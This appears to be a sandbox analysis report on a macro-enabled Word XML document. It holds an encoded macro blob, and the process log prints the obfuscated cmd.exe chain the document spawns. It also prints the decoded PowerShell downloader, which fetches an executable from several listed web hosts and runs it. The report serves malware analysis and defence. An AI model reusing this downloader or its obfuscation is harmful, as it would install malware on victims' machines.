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 AE4AAABAAAAL8AQAAAASNFZ4
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2984"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\2019-01.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2624"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-01.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4060c:\w8525\l1499\r2543\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2656CmD /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2700C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2788cmd.exeC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3188powershell $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 813
Read events
1 349
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRED61.tmp.cvr
MD5:
SHA256:
2624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98D08BF8.jpg
MD5:
SHA256:
3188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NKK579YCFXJ4079X2R5N.temp
MD5:
SHA256:
